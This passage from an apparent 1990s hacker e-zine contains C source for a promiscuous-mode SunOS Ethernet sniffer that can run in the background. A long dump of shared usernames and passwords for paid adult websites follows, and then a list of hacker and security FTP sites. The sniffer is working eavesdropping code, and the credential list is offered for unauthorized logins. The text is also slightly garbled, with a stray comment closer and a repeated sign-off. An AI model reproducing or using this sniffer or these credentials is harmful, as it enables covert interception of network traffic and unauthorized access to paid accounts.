/* opens network interface, performs ioctls and reads from it,
 * passing data to filter function
 */
void do_it()
{
    int cc;
    char *buf;
    u_short sp_ts_len;

    if(!(buf=malloc(CHUNKSIZE)))
        Pexit(1,"Eth: malloc");

/* this /dev/nit initialization code pinched from etherfind */
  {
    struct strioctl si;
    struct ifreq    ifr;
    struct timeval  timeout;
    u_int  chunksize = CHUNKSIZE;
    u_long if_flags  = NI_PROMISC;

    if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
        Pexit(1,"Eth: nit open");

    if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
        Pexit(1,"Eth: ioctl (I_SRDOPT)");

    si.ic_timout = INFTIM;

    if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
        Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");

    timeout.tv_sec = 1;
    timeout.tv_usec = 0;
    si.ic_cmd = NIOCSTIME;
    si.ic_len = sizeof(timeout);
    si.ic_dp  = (char *)&timeout;
    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
        Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");

    si.ic_cmd = NIOCSCHUNK;
    si.ic_len = sizeof(chunksize);
    si.ic_dp  = (char *)&chunksize;
    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
        Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");

    strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
    ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
    si.ic_cmd = NIOCBIND;
    si.ic_len = sizeof(ifr);
    si.ic_dp  = (char *)&ifr;
    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
        Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");

    si.ic_cmd = NIOCSFLAGS;
    si.ic_len = sizeof(if_flags);
    si.ic_dp  = (char *)&if_flags;
    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
        Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");

    if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
        Pexit(1,"Eth: ioctl (I_FLUSH)");
  }

    while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
        register char *bp = buf,
                      *bufstop = (buf + cc);

        while (bp < bufstop) {
            register char *cp = bp;
            register struct nit_bufhdr *hdrp;

            hdrp = (struct nit_bufhdr *)cp;
            cp += sizeof(struct nit_bufhdr);
            bp += hdrp->nhb_totlen;
            filter(cp, (u_long)hdrp->nhb_msglen);
        }
    }
    Pexit((-1),"Eth: read");
}
 /* Authorize your proogie,generate your own password and uncomment here */
/* #define AUTHPASSWD "EloiZgZejWyms" */

void getauth()
{ char *buf,*getpass(),*crypt();
  char pwd[21],prmpt[81];

    strcpy(pwd,AUTHPASSWD);
    sprintf(prmpt,"(%s)UP? ",ProgName);
    buf=getpass(prmpt);
    if(strcmp(pwd,crypt(buf,pwd)))
        exit(1);
}
    */
void main(argc, argv)
int argc;
char **argv;
{
    char   cbuf[BUFSIZ];
    struct ifconf ifc;
    int    s,
           ac=1,
           backg=0;

    ProgName=argv[0];

 /*     getauth(); */

    LOG=NULL;
    device=NULL;
    while((ac<argc) && (argv[ac][0] == '-')) {
       register char ch = argv[ac++][1];
       switch(toupper(ch)) {
            case 'I': device=argv[ac++];
                      break;
            case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
                         Zexit(1,"Output file cant be opened\n");
                      break;
            case 'B': backg=1;
                      break;
            case 'D': debug=1;
                      break;
            default : fprintf(ERR,
                        "Usage: %s [-b] [-d] [-i interface] [-f file]\n",
                            ProgName);
                      exit(1);
       }
    }

    if(!device) {
        if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
            Pexit(1,"Eth: socket");

        ifc.ifc_len = sizeof(cbuf);
        ifc.ifc_buf = cbuf;
        if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
            Pexit(1,"Eth: ioctl");

        close(s);
        device = ifc.ifc_req->ifr_name;
    }

    fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
    fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
            (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");

    if(!LOG)
        LOG=stdout;

    signal(SIGINT, death);
    signal(SIGTERM,death);
    signal(SIGKILL,death);
    signal(SIGQUIT,death);

    if(backg && debug) {
         fprintf(ERR,"[Cannot bg with debug on]\n");
         backg=0;
    }

    if(backg) {
        register int s;

        if((s=fork())>0) {
           fprintf(ERR,"[pid %d]\n",s);
           exit(0);
        } else if(s<0)
           Pexit(1,"fork");

        if( (s=open("/dev/tty",O_RDWR))>0 ) {
                ioctl(s,TIOCNOTTY,(char *)NULL);
                close(s);
        }
    }
    fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
    fflush(LOG);

    do_it();
}
>>>><<<<
I apologise for those who are looking for beginner advice in this issue.. i will make it up to those people in the next issue.
I hope that this file helps people who know how to compile these.

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXX                                       XXX passwords                                        XXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Note: if you aint 18 or whatever age you gotta be to go to these sites DONT! (or go.. i dont care)
oh. and these are obtained by me from other sites and stuff, i do not verify them i am posting them as a favor to you. so if they work, GREAT! if not. try a porn site not me.

-------------------------------------------------------------------
www.adultkey.com
key2950
253748
-------------------------------------------------------------------
www.heatxxx.com
u: bigdick
p: suckme
-------------------------------------------------------------------
www.slutland.com
u: ko
p: koo
-------------------------------------------------------------------
www.blacksexgoddess.com
u: 4328
p: 2994
-------------------------------------------------------------------
www.sexfinder.com
u: find345
p: sex496
-------------------------------------------------------------------
www.pandobox.com      password/password
-------------------------------------------------------------------
www.asianqueens.com/membersonly/aqy653d.html
L: Asian6
-------------------------------------------------------------------
www.adultcheck.com
p= 4275-cooters
p= 4356absolut1
-------------------------------------------------------------------
www.adultpass.com
u: cosanostra 
p: cosanostra 
-------------------------------------------------------------------
www.sexcinema.com
u: jack
p: off
-------------------------------------------------------------------
www.cafeflesh.com
u: CyPres
p: Spitfire
-------------------------------------------------------------------
www.nudecelebs.com
u: apache
p: longbow
-------------------------------------------------------------------
www.validate.com
username:  name
password:  pass
-------------------------------------------------------------------
www.pussyinferno.com
u: OCT
p: 1997
-------------------------------------------------------------------
xxxteensex.com   qwerty/qwerty
-------------------------------------------------------------------
galleryx.com    548609      548609
-------------------------------------------------------------------
galleryxxx.com    556709/556709
-------------------------------------------------------------------
susy.com    credit/card
-------------------------------------------------------------------
cyber.playboy.com/tour   l:pbtour  p:ejrw7bh3
-------------------------------------------------------------------
sextownusa.com  jr/pils
-------------------------------------------------------------------
sexroulette.com  pw=2thetop
-------------------------------------------------------------------
erosisland.com password/password
-------------------------------------------------------------------
hairpie.com yellow/alert
-------------------------------------------------------------------
hotlegs.com ksutton/imth10mn
-------------------------------------------------------------------
eyebait.com  guitar/plectrum
-------------------------------------------------------------------
blowjobcity.com    otc/1997
-------------------------------------------------------------------
nudevideo.com   solar/energy
-------------------------------------------------------------------
www1.hotchick.com/membersonly  killer/bee
-------------------------------------------------------------------
asexycafe   5346/2885
-------------------------------------------------------------------
adulterotica.com  muddy/muddy
-------------------------------------------------------------------
celebworld.com   wave/crest
-------------------------------------------------------------------
qstart.com/renee  nukem/tulip
-------------------------------------------------------------------
showoffs.com  klovn/bebe
-------------------------------------------------------------------
smeggy.com  trebor/kcol
-------------------------------------------------------------------
maniaxxx.com  qwerty/qwerty
-------------------------------------------------------------------
http://www2.teen-sex.com/members/  cottle/fuazi
-------------------------------------------------------------------
www.pussyhut.com     otc/1997
-------------------------------------------------------------------
xxxporno.com    lknight    what
-------------------------------------------------------------------
xxxclub.com     modern    walmac
-------------------------------------------------------------------
webvirgins.com      acces      acces
-------------------------------------------------------------------
cybererotica.com  rifil/xs90xs
-------------------------------------------------------------------
wetpussies.com  hot/pussy
-------------------------------------------------------------------
maniaxxx.com    qwerty    qwerty
-------------------------------------------------------------------
adultplayhouse.com 1111/1111
-------------------------------------------------------------------
hornydog.com  zztop/porno
-------------------------------------------------------------------
smutland.com   elsol    spot
-------------------------------------------------------------------
girltown.com  dick/head
-------------------------------------------------------------------
pics-xxx.com  brate/eagle
-------------------------------------------------------------------
http://www2.heatxxx.com/members/entry.htm L:1888 P:2127] [Wichtel]
-------------------------------------------------------------------
http://members.genesismagazine.com/home.html L:rudnicke P:christine] [Wichtel
-------------------------------------------------------------------
www.worldclass.inter.net/secure/celebs.html L:12307 P:97160] [smolder]
-------------------------------------------------------------------
members/cumbusters.com/home.html   KickAss/Dreamer
-------------------------------------------------------------------
sweet18.com -  wolf/wolf
-------------------------------------------------------------------
moontan.com   ap12/up
-------------------------------------------------------------------
smutfiles.com  diablo/scsi
-------------------------------------------------------------------
sexmuseum.com   moon5leg
-------------------------------------------------------------------
adulterotica.com   muddy/muddy
-------------------------------------------------------------------
heatxxx.com    heat / heat
-------------------------------------------------------------------
hot.wetpussies.com atest/atest
-------------------------------------------------------------------
wetpussies.com     6125579825/5682
-------------------------------------------------------------------
seventeen.fun.nl :whorez/ whorezxx
-------------------------------------------------------------------

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
OOOOOOOOOOOOOOOOO                   Sites Of Interest                       OOOOOOOOOOOOOOOOO
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
                           here are sites of intetrest to hackers and curious people
alex.sp.cs.cmu.edu      /links/security                 (Misc)
aql.gatech.edu                                          (40Hex)
athena-dist.mit.edu     /pub/ATHENA                     (Athena Project)
bellcore.com                                            (Bellcore)
camelot.usc.edu         /pub/cellular/DDIinfodemo       (Cellular)
cert.org                                                (CERT)
coast.cs.purdue.edu     /pub                            (Security)
coast.cs.purdue.edu     /pub                            (Coast)
cs.columbia.edu         /archives/mirror2/world-info/obi/Phracks
crimelab.com                                            (Crimelab)
dartmouth.edu           /pub/security                   (Security)
fc.net                  /pub/defcon                     (DefCon)
freeside.com                                            (Phrack)
lod.amaranth.com                                        (Legion of Doom)
ftp.apple.com           /pub/stud_reps/phrack           (Zines)
ftp.3com.com            /Orange-Book                    (Orange Book)
ftp.3com.com            /mirrors/zip                    (ZipCrypt)
ftp.IEunet.ie           /pub/security                   (Security)
ftp.armory.com          /pub/user/kmartind              (H/P)
ftp.cert.org            /pub                            (CERT)
ftp.cic.net             /pub/e-serials/alphabetic/p/phrack (Zines)
ftp.clark.net           /pub/jcase                      (H/P)
ftp.commerce.net        /pubs/standards/drafts/shttp.txt(Secure HyperText)
ftp.cs.uwm.edu          /pub/comp-privacy               (Comp. Privacy Digest)
ftp.csl.sri.com         /pub/nides                      (SRI)
ftp.csua.berkeley.edu   /pub/cypherpunks                (Crypto)
ftp.eff.org             /pub/cud                        (EFF)
ftp.elelab.nsc.co.jp    /pub/security                   (Security)
ftp.etext.org                                           (Etext)
ftp.fc.net
ftp.fh-berlin.de                                        (Wordlists)
ftp.greatcircle.com     /pub/firewalls                  (Firewalls)
ftp.halcyon.com         /pub/cud                        (Zines)
ftp.inoc.dl.nec.com     /pub/security                   (Security)
ftp.mcs.com             /mcsnet.users/crisadm/stuff/research/samples (Virii)
ftp.near.net            /security/archives/phrack       (Zines)
ftp.netcom.com          /pub/br/bradleym                (Virii)
ftp.netcom.com          /pub/va/vandal                  (DnA)
ftp.netcom.com          /pub/vo/vortex                  (Phiber-Scream)
ftp.netcom.com          /pub/zz/zzyzx                   (H/P)
ftp.ocs.mq.edu.au       /PC/Crypt                       (Crypto)
ftp.paranoia.com        /pub/toneloc/tl110.zip          (ToneLoc)
ftp.primus.com          /pub/armchair                   (Phoney)
ftp.primus.com          /pub/security                   (Security)
ftp.rahul.net           /pub/lps                        (Home of the FAQ)
ftp.std.com             /archives/alt.locksmithing      (Locksmithing)
ftp.std.com             /obi/Mischief/                  (MIT Guide to Lock...)
ftp.std.com             /obi/Phracks                    (Zines)
ftp.sunet.se            /pub/network/monitoring         (Ethernet sniffers)
ftp.sura.net            /pub/security                   (SURAnet)
ftp.tis.com             /pub                            (TIS)
ftp.uu.net              /doc/literary/obi/Phracks       (Zines)
ftp.warwick.ac.uk       /pub/cud                        (Zines)
ftp.win.tue.nl          /pub/security                   (Security)
ftp.winternet.com       /users/craigb                   (H/P)
ftp.wustl.edu           /doc/EFF                        (EFF)
furmint.nectar.cs.cmu.edu /security                     (Crypto)
garbo.uwasa.fi          /pc/crypt                       (Crypto)
irbis.llnl.gov          /pub                            (CIAC)
lcs.mit.edu             /telecom-archives               (Telecom archives)
mary.iia.org            /pub/users/patriot              (Misc)
net.tamu.edu            /pub/security/TAMU              (Security)
net23.com               /pub                            (Max Headroom)
nic.ddn.mil             /scc                            (DDN Security)
nic.funet.fi            /pub/doc/cud                    (Zines)
paradox1.denver.colorado.edu  /anonymous/text-files/pyrotechnics (Pyro)
pyrite.rutgers.edu      /pub/security                   (Security)
relay.cs.toronto.edu    /doc/telecom-archives           (Telecom)
rena.dit.co.jp          /pub/security                   (Security)
research.att.com        /dist/internet_security         (AT&T)
ripem.msu.edu           /pub/crypt                      (Ripem)
rs1.rrz.uni-koeln.de                                    (Wordlists)
rtfm.mit.edu                                            (Etext)
rtfm.mit.edu            /pub/usenet-by-group            (Usenet FAQ's)
sable.ox.ac.uk                                          (Wordlists)
scss3.cl.msu.edu        /pub/crypt                      (Crypto)
sekurity.com                                            (TNO)
spy.org                                                 (CSC)
suburbia.apana.org.au   /pub/unix/security              (Security)
theta.iis.u-tokyo.ac.jp /pub1/security                  (Security)
titania.mathematik.uni-ulm.de /pub/security             (Security)
uceng.uc.edu            /pub/kerberos.documentation     (Kerberos)
wimsey.bc.ca            /pub/crypto                     (Crypto)


Thats it for this issue of Riot Freedom Hacks.

Send me some email if you like what you see here, if you want to suggest something that i should include, or if you are able to help me by writing articles for this mag.

pbot1@hotmail.com

PeAcE

Endless Nameless

ndless Nameless